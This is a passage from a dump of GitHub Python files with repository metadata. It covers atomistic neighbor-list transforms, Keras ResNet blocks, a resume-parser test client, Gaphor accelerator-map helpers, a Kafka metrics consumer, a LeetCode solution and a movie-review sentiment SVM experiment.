device=cell.device)\n r3 = torch.arange(1, num_repeats[2] + 1, device=cell.device)\n o = torch.zeros(1, dtype=torch.long, device=cell.device)\n\n return torch.cat(\n [\n torch.cartesian_prod(r1, r2, r3),\n torch.cartesian_prod(r1, r2, o),\n torch.cartesian_prod(r1, r2, -r3),\n torch.cartesian_prod(r1, o, r3),\n torch.cartesian_prod(r1, o, o),\n torch.cartesian_prod(r1, o, -r3),\n torch.cartesian_prod(r1, -r2, r3),\n torch.cartesian_prod(r1, -r2, o),\n torch.cartesian_prod(r1, -r2, -r3),\n torch.cartesian_prod(o, r2, r3),\n torch.cartesian_prod(o, r2, o),\n torch.cartesian_prod(o, r2, -r3),\n torch.cartesian_prod(o, o, r3),\n ]\n )\n\n\nclass FilterNeighbors(Transform):\n \"\"\"\n Filter out all neighbor list indices corresponding to interactions between a set of\n atoms. 
This set of atoms must be specified in the input data.\n \"\"\"\n\n def __init__(self, selection_name: str):\n \"\"\"\n Args:\n selection_name (str): key in the input data corresponding to the set of\n atoms between which no interactions should be considered.\n \"\"\"\n self.selection_name = selection_name\n super().__init__()\n\n def forward(\n self,\n inputs: Dict[str, torch.Tensor],\n ) -> Dict[str, torch.Tensor]:\n\n n_neighbors = inputs[properties.idx_i].shape[0]\n slab_indices = inputs[self.selection_name].tolist()\n kept_nbh_indices = []\n for nbh_idx in range(n_neighbors):\n i = inputs[properties.idx_i][nbh_idx].item()\n j = inputs[properties.idx_j][nbh_idx].item()\n if i not in slab_indices or j not in slab_indices:\n kept_nbh_indices.append(nbh_idx)\n\n inputs[properties.idx_i] = inputs[properties.idx_i][kept_nbh_indices]\n inputs[properties.idx_j] = inputs[properties.idx_j][kept_nbh_indices]\n inputs[properties.offsets] = inputs[properties.offsets][kept_nbh_indices]\n\n return inputs\n\n\nclass CollectAtomTriples(Transform):\n \"\"\"\n Generate the index tensors for all triples between atoms within the cutoff shell.\n \"\"\"\n\n is_preprocessor: bool = True\n is_postprocessor: bool = False\n\n def forward(\n self,\n inputs: Dict[str, torch.Tensor],\n ) -> Dict[str, torch.Tensor]:\n \"\"\"\n Using the neighbors contained within the cutoff shell, generate all unique pairs\n of neighbors and convert them to index arrays. Applied to the neighbor arrays,\n these arrays generate the indices involved in the atom triples.\n\n Example:\n idx_j[idx_j_triples] -> j atom in triple\n idx_j[idx_k_triples] -> k atom in triple\n Rij[idx_j_triples] -> Rij vector in triple\n Rij[idx_k_triples] -> Rik vector in triple\n \"\"\"\n idx_i = inputs[properties.idx_i]\n\n _, n_neighbors = torch.unique_consecutive(idx_i, return_counts=True)\n\n offset = 0\n idx_i_triples = ()\n idx_jk_triples = ()\n for idx in range(n_neighbors.shape[0]):\n triples = torch.combinations(\n torch.arange(offset, offset + n_neighbors[idx]), r=2\n )\n idx_i_triples += (torch.ones(triples.shape[0], dtype=torch.long) * idx,)\n idx_jk_triples += (triples,)\n offset += n_neighbors[idx]\n\n idx_i_triples = torch.cat(idx_i_triples)\n\n idx_jk_triples = torch.cat(idx_jk_triples)\n idx_j_triples, idx_k_triples = idx_jk_triples.split(1, dim=-1)\n\n inputs[properties.idx_i_triples] = idx_i_triples\n inputs[properties.idx_j_triples] = idx_j_triples.squeeze(-1)\n inputs[properties.idx_k_triples] = idx_k_triples.squeeze(-1)\n return inputs\n\n\nclass CountNeighbors(Transform):\n \"\"\"\n Store the number of neighbors for each atom\n \"\"\"\n\n is_preprocessor: bool = True\n is_postprocessor: bool = False\n\n def __init__(self, sorted: bool = True):\n \"\"\"\n Args:\n sorted: Set to false if chosen neighbor list yields unsorted center indices\n (idx_i).\n \"\"\"\n super(CountNeighbors, self).__init__()\n self.sorted = sorted\n\n def forward(\n self,\n inputs: Dict[str, torch.Tensor],\n ) -> Dict[str, torch.Tensor]:\n idx_i = inputs[properties.idx_i]\n\n if self.sorted:\n _, n_nbh = torch.unique_consecutive(idx_i, return_counts=True)\n else:\n _, n_nbh = torch.unique(idx_i, return_counts=True)\n\n inputs[properties.n_nbh] = n_nbh\n return inputs\n\n\nclass WrapPositions(Transform):\n \"\"\"\n Wrap atom positions into periodic cell. 
This routine requires a non-zero cell.\n The cell center of the inverse cell is set to (0.5, 0.5, 0.5).\n \"\"\"\n\n is_preprocessor: bool = True\n is_postprocessor: bool = False\n\n def __init__(self, eps: float = 1e-6):\n \"\"\"\n Args:\n eps (float): small offset for numerical stability.\n \"\"\"\n super().__init__()\n self.eps = eps\n\n def forward(\n self,\n inputs: Dict[str, torch.Tensor],\n ) -> Dict[str, torch.Tensor]:\n R = inputs[properties.R]\n cell = inputs[properties.cell].view(3, 3)\n pbc = inputs[properties.pbc]\n\n inverse_cell = torch.inverse(cell)\n inv_positions = torch.sum(R[..., None] * inverse_cell[None, ...], dim=1)\n\n periodic = torch.masked_select(inv_positions, pbc[None, ...])\n\n # Apply periodic boundary conditions (with small buffer)\n periodic = periodic + self.eps\n periodic = periodic % 1.0\n periodic = periodic - self.eps\n\n # Update fractional coordinates\n inv_positions.masked_scatter_(pbc[None, ...], periodic)\n\n # Convert to positions\n R_wrapped = torch.sum(inv_positions[..., None] * cell[None, ...], dim=1)\n\n inputs[properties.R] = R_wrapped\n\n return inputs\n","repo_name":"atomistic-machine-learning/schnetpack","sub_path":"src/schnetpack/transform/neighborlist.py","file_name":"neighborlist.py","file_ext":"py","file_size_in_byte":24436,"program_lang":"python","lang":"en","doc_type":"code","stars":662,"dataset":"github-code","pt":"19"} +{"seq_id":"26656633464","text":"\"\"\"\nImplementational details and references\n\n[1] Medium Article, https://towardsdatascience.com/understand-and-implement-resnet-50-with-tensorflow-2-0-1190b9b52691\n[2] ResNet Paper, https://arxiv.org/pdf/1512.03385.pdf\n\"\"\"\n\nimport tensorflow as tf\n\n\nclass ResnetIdentityBlock(tf.keras.Model):\n def __init__(self, kernel_size, filters, scope=''):\n super(ResnetIdentityBlock, self).__init__(name=scope)\n filters1, filters2 = filters\n\n self.conv2a = tf.keras.layers.Conv2D(filters1, (1, 1))\n self.bn2a = tf.keras.layers.BatchNormalization()\n\n self.conv2b = tf.keras.layers.Conv2D(filters1, kernel_size,\n padding='same')\n self.bn2b = tf.keras.layers.BatchNormalization()\n\n self.conv2c = tf.keras.layers.Conv2D(filters2, (1, 1))\n self.bn2c = tf.keras.layers.BatchNormalization()\n\n def call(self, input_tensor, training=False):\n x = self.conv2a(input_tensor)\n x = self.bn2a(x, training=training)\n x = tf.nn.relu(x)\n\n x = self.conv2b(x)\n x = self.bn2b(x, training=training)\n x = tf.nn.relu(x)\n\n x = self.conv2c(x)\n x = self.bn2c(x, training=training)\n\n x += input_tensor\n return tf.nn.relu(x)\n\n\nclass ResnetConvolutionBlock(tf.keras.Model):\n def __init__(self, kernel_size, filters, stride=2, scope=''):\n super(ResnetConvolutionBlock, self).__init__(name=scope)\n filters1, filters2 = filters\n\n self.conv2a = tf.keras.layers.Conv2D(filters1,\n (1, 1),\n strides=stride)\n self.bn2a = tf.keras.layers.BatchNormalization()\n\n self.conv2b = tf.keras.layers.Conv2D(filters1, kernel_size,\n padding='same')\n self.bn2b = tf.keras.layers.BatchNormalization()\n\n self.conv2c = tf.keras.layers.Conv2D(filters2, (1, 1))\n self.bn2c = tf.keras.layers.BatchNormalization()\n\n # shortcut\n self.conv2d = tf.keras.layers.Conv2D(filters2,\n (1, 1),\n strides=stride)\n self.bn2d = tf.keras.layers.BatchNormalization()\n\n def call(self, input_tensor, training=False):\n x = self.conv2a(input_tensor)\n x = self.bn2a(x, training=training)\n x = tf.nn.relu(x)\n\n x = self.conv2b(x)\n x = self.bn2b(x, training=training)\n x = tf.nn.relu(x)\n\n x = self.conv2c(x)\n x = self.bn2c(x, 
training=training)\n # no act\n\n x_short = self.conv2d(input_tensor)\n x_short = self.bn2d(x_short, training=training)\n # no act short\n\n # combine\n x = x + x_short\n\n return tf.nn.relu(x)\n\n\nif __name__ == \"__main__\":\n\n # define test functions\n def test_build_resnet():\n\n import numpy as np\n from tensorflow import keras\n from tensorflow.keras import (\n losses,\n optimizers,\n layers\n )\n\n x = np.random.random((64, 10, 10, 1))\n y = np.random.randint(0, 19, size=(64, 1))\n\n blocks = [\n # block 1\n # ResnetIdentityBlock(3, [32, 64]),\n ResnetConvolutionBlock(3, [32, 64]),\n ResnetIdentityBlock(3, [32, 64]),\n ResnetIdentityBlock(3, [32, 64]),\n\n # block 2\n ResnetConvolutionBlock(3, [64, 128]),\n ResnetIdentityBlock(3, [64, 128]),\n ResnetIdentityBlock(3, [64, 128]),\n\n # block 3\n ResnetConvolutionBlock(3, [128, 256]),\n ResnetIdentityBlock(3, [128, 256]),\n ResnetIdentityBlock(3, [128, 256]),\n\n ]\n\n model = keras.models.Sequential([\n layers.Input(shape=x.shape[1:]),\n *blocks,\n layers.Flatten(),\n layers.Dense(20, activation='softmax')\n ])\n\n model.compile(loss=losses.sparse_categorical_crossentropy,\n optimizer=optimizers.Adam())\n\n print(model.summary())\n model.fit(x, y)\n\n # test_resnet_bottleneck()\n test_build_resnet()\n","repo_name":"saideeptiku/Stone","sub_path":"stone/resnet_blocks.py","file_name":"resnet_blocks.py","file_ext":"py","file_size_in_byte":4169,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"} +{"seq_id":"33044710864","text":"import datetime\nimport requests\nimport json\nimport base64\nimport sys\nimport zlib\nimport csv\n\nmaxInt = sys.maxsize\ndecrement = True\n\nwhile decrement:\n # decrease the maxInt value by factor 10\n # as long as the OverflowError occurs.\n\n decrement = False\n try:\n csv.field_size_limit(maxInt)\n except OverflowError:\n maxInt = int(maxInt/10)\n decrement = True\n\nserverAddress = \"10.0.0.115\"\n\ndef content_parse(content):\n data = {\n 'base_cont': content,\n 'fname': \"test.txt\"\n }\n print(data)\n response = requests.post(\n 'http://%s:2015/api/ResumeParser' % serverAddress,\n data=json.dumps(data),\n auth=('admin', '2015')\n )\n if response.status_code == 200:\n result = response.json()\n return result\n else:\n return {}\n\n\nfname = '/home/ubuntu/data/raw2/part-r-00037-d13cfcb7-8d60-45c1-b4a4-657a6a7b3217.csv'\nwith open(fname, 'r') as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n content = zlib.decompress(base64.b64decode(row[1]))\n content = base64.b64encode(content).decode('ascii')\n\n parsed = content_parse(content)\n break\n # resume = parsed.get(\"result\", {})\n # print(resume)\n","repo_name":"canbridge/airflow-work","sub_path":"test/test_press.py","file_name":"test_press.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"11424981898","text":"from __future__ import absolute_import\nimport os, os.path\nimport gtk\n\nfrom gaphor.misc import get_user_data_dir\n\ndef _get_accel_map_filename():\n \"\"\"\n The Gaphor accelMap file ($HOME/.gaphor/accelmap).\n \"\"\"\n \n user_data_dir = get_user_data_dir()\n \n if not os.path.exists(user_data_dir):\n os.mkdir(user_data_dir)\n return os.path.join(user_data_dir, 'accelmap')\n\n\ndef load_accel_map():\n \"\"\"\n Load the user accelerator map from the gaphor user home directory\n \"\"\"\n filename = _get_accel_map_filename()\n if os.path.exists(filename) and os.path.isfile(filename):\n 
gtk.accel_map_load(filename)\n\n\ndef save_accel_map():\n \"\"\"\n Save the contents of the GtkAccelMap to a file.\n \"\"\"\n filename = _get_accel_map_filename()\n gtk.accel_map_save(filename) \n\n\n# vim:sw=4:et:\n","repo_name":"gitter-badger/dabbler","sub_path":"gaphor/ui/accelmap.py","file_name":"accelmap.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"31911561821","text":"import json\nfrom datetime import (\n\tdatetime, timezone,\n)\n\nfrom kafka import KafkaConsumer\n\nfrom .postgres import (\n\tConnection,\n\tSystemMetrics,\n)\n\nclass MetricsConsumer:\n\tdef __init__(self, settings):\n\t\tself.settings = settings\n\n\t\tif self.settings.kafka_security_protocol == 'SSL':\n\t\t\tself.kafka_consumer = KafkaConsumer(\n\t\t\t\tself.settings.metrics_topic,\n\t\t\t\tbootstrap_servers=self.settings.kafka_addr,\n\t\t\t\tsecurity_protocol = self.settings.kafka_security_protocol,\n\t\t\t\tssl_cafile = self.settings.kafka_cafile,\n\t\t\t\tssl_certfile = self.settings.kafka_certfile,\n\t\t\t\tssl_keyfile = self.settings.kafka_keyfile,\n\t\t\t\tclient_id=self.settings.consumer_client_id,\n\t\t\t\tgroup_id=self.settings.consumer_group_id,\n\t\t\t)\n\t\telse:\n\t\t\tself.kafka_consumer = KafkaConsumer(\n\t\t\t\tself.settings.metrics_topic,\n\t\t\t\tbootstrap_servers=self.settings.kafka_addr,\n\t\t\t\tclient_id=self.settings.consumer_client_id,\n\t\t\t\tgroup_id=self.settings.consumer_group_id,\n\t\t\t)\n\n\t\tself.pg_connection = Connection(self.settings.postgres_addr)\n\n\tdef start(self):\n\t\tself.kafka_consumer.poll()\n\t\tself.kafka_consumer.commit()\n\t\twhile True:\n\t\t\tself.consume()\n\n\tdef consume(self):\n\t\traw_items = self.kafka_consumer.poll()\n\t\tfor topic, raw_messages in raw_items.items():\n\t\t\tfor raw_msg in raw_messages:\n\t\t\t\tmetrics = json.loads(raw_msg.value.decode('utf-8'))\n\t\t\t\tself.save_to_postgres(metrics)\n\t\t\t\tprint(f'Saved to Postgres: {metrics}')\n\t\tself.kafka_consumer.commit()\n\n\tdef save_to_postgres(self, metrics):\n\t\tmetrics = SystemMetrics(\n\t\t\thostname=metrics.get('hostname'),\n\t\t\ttimestamp=datetime.fromisoformat(metrics.get('timestamp')),\n\t\t\tmemory_total=metrics.get('memory_total'),\n\t\t\tmemory_available=metrics.get('memory_available'),\n\t\t\tmemory_free=metrics.get('memory_free'),\n\t\t\tmemory_percent=metrics.get('memory_percent'),\n\t\t)\n\t\tself.pg_connection.session.add(metrics)\n\t\tself.pg_connection.session.commit()\n","repo_name":"arttu/metrics-consumer-producer","sub_path":"metrics_consumer/consumer/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22401889883","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 1 22:33:20 2020\n\n@author: z.chen7\n\"\"\"\n\n# 404. Sum of Left Leaves\n\n\"\"\"\nFind the sum of all left leaves in a given binary tree.\n\nExample:\n\n 3\n / \\\n 9 20\n / \\\n 15 7\n\nThere are two left leaves in the binary tree, with values 9 and 15 respectively. 
Return 24.\n\"\"\"\n\nimport collections\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def sumOfLeftLeaves(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n if not root:\n return 0\n \n result = 0\n queue = collections.deque()\n queue.appendleft((root, False))\n while queue:\n node, is_left = queue.pop()\n if not node.left and not node.right and is_left:\n result += node.val\n \n if node.left:\n queue.append((node.left, True))\n \n if node.right:\n queue.append((node.right, False))\n \n return result","repo_name":"holmes1313/Leetcode","sub_path":"Classic/404_Sum_of_Left_Leaves.py","file_name":"404_Sum_of_Left_Leaves.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"18427062566","text":"import nltk\nimport numpy as np\nimport pandas as pd\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.svm import LinearSVC, LinearSVR\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.metrics import confusion_matrix as cm, accuracy_score\nfrom sklearn.svm import SVR\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.neighbors import NearestNeighbors\n\nfrom nltk.corpus import stopwords, wordnet \nfrom nltk import word_tokenize, WordNetLemmatizer, sent_tokenize\nfrom nltk.corpus import wordnet as wn\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import plot_confusion_matrix\nfrom sklearn.metrics import classification_report ,confusion_matrix as cm \nfrom nltk import pos_tag\nimport scipy as sc\nfrom sklearn.metrics import mean_squared_error, r2_score\n\n#nltk.download('all')\n# Read the files into dataframes\ndf_train = pd.read_csv(\"train.tsv\", sep=\"\\t\")\ndf_test = pd.read_csv(\"test.tsv\", sep=\"\\t\")\ndf_traintest = pd.read_csv(\"traintest.tsv\", sep=\"\\t\")\n\n\n# Take only the whole sentence if we want to give sentiment per sentence/review\ndf_drop_train = df_train.drop_duplicates(['SentenceId']).groupby('SentenceId').head(1).reset_index()#pd.read_csv(\"train_sentences.tsv\", sep=\"\\t\") #\ndf_drop_test = df_test.drop_duplicates(['SentenceId']).groupby('SentenceId').head(1).reset_index()#pd.read_csv(\"test_sentences.tsv\", sep=\"\\t\") #\ndf_drop_traintest= df_traintest.drop_duplicates(['SentenceId']).groupby('SentenceId').head(1).reset_index()#pd.read_csv(\"traintest_sentences.tsv\", sep=\"\\t\") #\n\n#df_drop_train.to_csv('train_sentences.tsv', index=False, sep = '\\t')\n#df_drop_test.to_csv('test_sentences.tsv', index=False, sep = '\\t')\n\n# SVM Regression\nsvr = LinearSVR(C=1.0,\n epsilon=0.2,\n max_iter=100000,\n tol=1e-05)\n# SVM OVA\nsvc = LinearSVC(C=1.0,\n class_weight='balanced',\n dual=True,\n fit_intercept=True,\n intercept_scaling=1,\n loss='squared_hinge',\n max_iter=10000,\n multi_class='ovr',\n penalty='l2',\n random_state=0,\n tol=1e-05,\n verbose=0\n)\n# Vectorizer to create tfidf feature vector: http://blog.christianperone.com/2011/09/machine-learning-text-feature-extraction-tf-idf-part-i/\nvectorizer = TfidfVectorizer(min_df = 5,\n max_df = 0.8,\n sublinear_tf = True,\n use_idf = True,\n )\n #stop_words='english')\n\n# Select which set to use\nSetChoice= \"Combined\"\n\n#Match h to vectX_test \nh = 5000\nw = 5000\n# Combine the train and test set into one file such that tfidf vectorizer will give same feature vector length, required for when predicting\nif SetChoice == \"Combined\":\n 
print(\"Using Combined\")\n X_traintest= df_traintest.Phrase\n vectX_traintest = vectorizer.fit_transform(X_traintest)\n vectX = vectX_traintest[:156060]\n vectX_test = vectX_traintest[156060:]\n vectX = vectX[:h] #CUT FOR REG, can remove\n vectX_test = vectX_test[w:2*w] #CUT FOR REG, can remove\n y = df_traintest[:156060].Sentiment\n y_test = y[w:2*w]\n y = y[:h] #CUT FOR REG, can remove\n\n\nif SetChoice == \"CombinedSentences\":\n print(\"Using CombinedSentences\")\n X_traintest= df_drop_traintest.Phrase\n #print(X_traintest)\n print(X_traintest[:8529]) #index doesn't match with sentence number because some sentence numbers are missing\n print(X_traintest[8529:])\n vectX_traintest = vectorizer.fit_transform(X_traintest)\n vectX = vectX_traintest[:8529]\n vectX_test = vectX_traintest[8529:]\n #vectX = vectX[:20000] #CUT FOR REG, can remove\n #vectX_test = vectX_test[:20000] #CUT FOR REG, can remove\n y = df_traintest[:8529].Sentiment\n #y = y[:20000] #CUT FOR REG, can remove\n print(vectorizer.get_feature_names())\n print(\"{} {} {} {}\".format(np.shape(vectX_traintest),np.shape(vectX),np.shape(vectX_test),np.shape(y)) )\n\n# For when classifying all phrases\nif SetChoice == \"Phrases\":\n print(\"Using Phrases\")\n #cut to reduce run time when using svr\n df_cut_train = df_train[:250]\n df_cut_test = df_test[:250]\n X = df_cut_train.Phrase\n y = df_cut_train.Sentiment\n vectX = vectorizer.fit_transform(X)\n\n#For when classifying only sentences/reviews\nif SetChoice == \"Sentences\":\n print(\"Using Sentences\")\n X = df_drop_train.Phrase\n y = df_drop_train.Sentiment\n vectX = vectorizer.fit_transform(X)\n\n#K fold cross evaluation for SVM OVA\nskf = StratifiedKFold(n_splits=3)\nfor train, test in skf.split(vectX, y):\n svc.fit(vectX[train], y[train])\n train_score = svc.score(vectX[train], y[train])\n test_score = svc.score(vectX[test], y[test])\n print(\"SVM OVA: Train Score = {}, Test Score= {}\".format(train_score, test_score))\n\n#K fold cross evaluation for SVM Regression\nskf_svr = StratifiedKFold(n_splits=3)\nfor train, test in skf_svr.split(vectX, y):\n svr.fit(vectX[train], y[train])\n train_pred = svr.predict(vectX[train])\n test_pred = svr.predict(vectX[test])\n train_acc = accuracy_score(np.clip(np.round(train_pred), 0, 4), y[train])\n test_acc = accuracy_score(np.clip(np.round(test_pred), 0, 4), y[test])\n print(\"SVM REG: Train Score = {}, Test Score= {}\".format(train_acc, test_acc))\n\nif SetChoice == \"Combined\" or SetChoice == \"CombinedSentences\":\n #predict test set with svc\n total_list = 
np.array(svc.predict(vectX_test))\n #np.set_printoptions(threshold=np.inf) # For printing entire array\n print(total_list)\n y_true = np.array(y_test)\n \n print(np.var(total_list))\n print(np.mean(total_list)) \n #print(vectorizer.get_feature_names())\n\n #Naive Bayes classifier for PSP\n gnb = GaussianNB()\n gnbfit = gnb.fit(vectX.toarray(), y)\n prediction = gnbfit.predict(vectX_test.toarray())\n print(prediction)\n print(len(prediction))\n '''\n Mapping : The negative distance between the predicted(total_list) and actual labels(y) of vectX\n Set h to size of indices, label_dist, sim....\n ''' \ndef get_mapping(h):\n mapping = [0 for z in range(h)]\n \n for i in range(h):\n mapping[i] = (-1)*(total_list[i] - y[i])\n #print('Mapping', mapping)\n \n return mapping\n\n'''\nGenerate confusion matrices \n''' \ndef confusion_matrix(classifier, vectX, y_true, y_pred):\n \n my_cm = cm(y_true, y_pred, labels=[0.0,1.0,2.0,3.0,4.0])\n print(my_cm)\n \n labels=[0.0,1.0,2.0,3.0,4.0]\n np.set_printoptions(precision=2) \n # Plot non-normalized confusion matrix\n titles_options = [(\"Confusion matrix, without normalization\", None),\n (\"Normalized confusion matrix\", 'true')]\n for title, normalize in titles_options:\n disp = plot_confusion_matrix(classifier, vectX ,y_true,\n display_labels=labels,\n cmap=plt.cm.Reds,\n normalize=normalize) \n disp.ax_.set_title(title)\n print(title)\n print(disp.confusion_matrix) \n plt.show()\n \n'''\ncm_1 -> confusion matrix for svc\n'''\n#cm_1 = confusion_matrix(svc, vectX, y_true, total_list)\n#print(cm_1)\n\n \n'''\nSimilarity function for metric labelling : \n#TODO : add ref to tutorial\n'''\n\ndef penn_to_wn(tag):\n \"\"\" Convert between a Penn Treebank tag to a simplified Wordnet tag \"\"\"\n if tag.startswith('N'):\n return 'n'\n \n if tag.startswith('V'):\n return 'v'\n \n if tag.startswith('J'):\n return 'a'\n \n if tag.startswith('R'):\n return 'r'\n return None\n\ndef tagged_to_synset(word, tag):\n wn_tag = penn_to_wn(tag)\n if wn_tag is None:\n return None\n try:\n return wn.synsets(word, wn_tag)[0]\n except:\n return None\n\n#Compare the similarity between two sentences using Wordnet\ndef sentence_similarity(sentence1, sentence2):\n\n \"\"\" compute the sentence similarity using Wordnet \"\"\"\n # Tokenize and tag\n sentence1 = pos_tag(word_tokenize(sentence1))\n sentence2 = pos_tag(word_tokenize(sentence2))\n \n # Get the synsets for the tagged words\n synsets1 = [tagged_to_synset(*tagged_word) for tagged_word in sentence1]\n synsets2 = [tagged_to_synset(*tagged_word) for tagged_word in sentence2]\n \n # Filter out the Nones\n synsets1 = [ss for ss in synsets1 if ss]\n synsets2 = [ss for ss in synsets2 if ss]\n \n score, count = 0.0, 0\n # For each word in the first sentence\n for synset in synsets1:\n # Get the similarity value of the most similar word in the other sentence\n # Check that the similarity could have been computed\n try:\n best_score = max([synset.path_similarity(ss) for ss in synsets2]) \n score += best_score\n count += 1\n score /= count\n return score\n except:\n return None \n \n''' \nFinding the nearest neighbour of a phrase \nReturns indices or small_indices\nPrints distances, indices of the nearest neighbour to x\n'''\ndef knearest(h):\n nbrs = NearestNeighbors(algorithm='auto', leaf_size=30, n_neighbors=2, p=2,\n radius=1.0).fit(vectX)\n distances, indices = nbrs.kneighbors(vectX)\n \n #Prints the distances between datapoint x and its neighbour \n #(including distance from x to x thus 0)\n \n print('Distances', distances)\n \n 
#Prints the indices of x and its neighbour\n print('Indices', indices)\n\n #Use small_indices to run all of the code faster\n #Make sure that the cut on the indices matches the size of sim, mapping, label_dist\n small_indices = indices[:h]\n return small_indices\n\n''' Returns cosine similarity list : cosim\n'''\ndef get_similarity_cosine(indices, h):\n #h is the number of lists, w is the number of items\n cosim = [0 for z in range(h)]\n\n for x in range(h):\n for i in indices: \n #Cosine similarity -. most values equate to 1\n cosimscore = 1 - sc.spatial.distance.cosine(y[i[0]], y[i[1]]) \n cosim[x] = cosimscore\n return cosim\n\n\n'''\nReturns wordnet similarity list : sim with dimensions w,h\nCalls sentence_similarity()\nUses X (sentence training dataframe)\ndef get_similarity_wordnet(indices, h):\n #h is the number of lists, w is the number of items\n #For every additional neighbour, increase item size w by 1\n w = 1\n #Initalize sim, X\n sim = [[0 for x in range(w)] for y in range(h)] \n X = df_drop_train.Phrase\n#For each i in indices, compute the similarity between \n#the sentence x and its neighbour (i[0],i[1]) and put this score into each list\n#in sim.\n for k in range(h):\n for i in indices: \n score = sentence_similarity(X.iloc[i[0]],X.iloc[i[1]]) \n #If score = None, means no similarity\n if score == None: \n score = 0\n sim[k] = score\n #Line print below for dealing with large datasets, checking how far the program has run\n print('Done with computing the sim')\n \n #Return sim\n return sim\n'''\n\n'''\nReturns final output\nldict : the labels for the indices \nlabel_dist : Calculates the distance between label of x, and its neighbour\ncollective : Multiples label_dist by the similarity score for x and its neighbour (sim)\n : For more than 1 neighbors, please add summation function\n : alpha is hyperparameter. Can be tuned. \nmapping : Calculates the negative distance between the label assigned and (is initalized above)\nfinal_score : The mapping + alpha(collective)\nnew_labels : Generate the new label of x, based on the final_score. Round this. 
\n'''\ndef getlabel(indices, sim, mapping, h):\n #Size of label_dist = 200\n ldict = [(y[x]) for x in indices]\n label_dist = [0 for z in range(h)]\n collective = [0 for z in range(h)]\n final_score = [0 for z in range(h)]\n new_labels = [0 for z in range(h)]\n alpha = 0.55\n \n for i in range(h):\n #Label distance for label_dist\n dist = np.abs(ldict[i].iloc[0]-ldict[i].iloc[1]) \n label_dist[i] = int(dist)\n # Get similarity score\n simscore = sim[i]\n #Calculate collective score\n collective[i] = alpha*(dist*simscore)\n #Get mapping\n map = mapping[i]\n #Calculate final score\n final_score[i] = map + collective[i]\n #Generate the new labels\n new_labels[i] = round(total_list[i] + final_score[i])\n \n #Print these, please comment out for large datasets\n #print('Collective:', collective)\n #print('Finale:', new_labels)\n #print('New Labels',new_labels)\n \n return new_labels\n\n'''\nFunction Calls\n'''\n#H is the number of datapoints, set accordingly\nmapping = get_mapping(h)\nindices = knearest(h)\nsim = get_similarity_cosine(indices, h)\n#sim = get_similarity_wordnet(indices, h)\nnew_labels = getlabel(indices, sim, mapping,h)\n\n'''\nEvaluation Metrics for SVC\n'''\nmy_cm = cm(y_true, total_list, labels=[0.0,1.0,2.0,3.0,4.0])\nprint('CM : No metric' , my_cm)\n\ncm_metric_cosine = cm(y_true, new_labels, labels=[0.0,1.0,2.0,3.0,4.0])\nprint('CM Metric Cosine',cm_metric_cosine)\n\nprint(classification_report(y_true, total_list))\nprint(classification_report(y_true, new_labels))\n\n\n'''\nEvaluation Metrics for SVR\nmse_svr = mean_squared_error(y_true, total_list)\nmse_svr_ml = mean_squared_error(y_true, new_labels)\nr2_svr_ml = r2_score(y_true, new_labels)\nr2_svr = r2_score(y_true, total_list)\nprint(mse_svr, mse_svr_ml, r2_svr_ml, r2_svr)\n'''\n\n#similarity(label_dist)\n#sim = distance(labels)\n","repo_name":"jkatzy/IN4325","sub_path":"SVMreg.py","file_name":"SVMreg.py","file_ext":"py","file_size_in_byte":14456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"41940984808","text":"#!/usr/bin/env python\n\ndef file_to_list(file_name):\n\ttri_data = open(file_name, \"r\")\n\n\tline = tri_data.readline()\n\ttriangle = []\n\t\n\twhile line:\n\t\tnumbers = [int(i) for i in line.split()]\n\t\ttriangle.append(numbers)\t\t\n\t\t\n\t\tline = tri_data.readline()\n\n\treturn triangle\n\ndef find_max_sum(tri_list):\n\tfor i in reversed(range(len(tri_list)-1)):\n\t\tfor j in range(len(tri_list[i])):\n\t\t\tbigger_number = max(tri_list[i+1][j], tri_list[i+1][j+1])\n\t\t\ttri_list[i][j] += bigger_number\n\n\treturn tri_list[0][0]\n\n\n#data = file_to_list(\"TRITEST.txt\")\ndata = file_to_list(\"TRIANGLE.txt\")\n\nans = find_max_sum(data)\nprint(ans)","repo_name":"aerotog/Python-Puzzles","sub_path":"TOGPyTri.py","file_name":"TOGPyTri.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"5052616600","text":"import numpy as np\nimport pandas as pd\nfrom ..utils import logger\n\ndef reduce_mem_usage(df: pd.DataFrame, verbose=True) -> pd.DataFrame:\n \"\"\"\n Save memory by down-casting numeric columns to lower-precision dtypes\n\n Parameters\n ----------\n df : pd.DataFrame\n The data to be converted\n verbose : bool\n Whether to log the result\n\n Returns\n -------\n df : pd.DataFrame\n The converted data; the input is not modified in place\n \"\"\"\n # work on a copy to avoid overwriting the caller's data\n df = df.copy(deep=True)\n numerics = ['int16', 'int32', 'int64', 'float16', 'float32', 'float64']\n start_mem = df.memory_usage().sum() / 1024**2\n for col in df.columns:\n col_type = df[col].dtypes\n if 
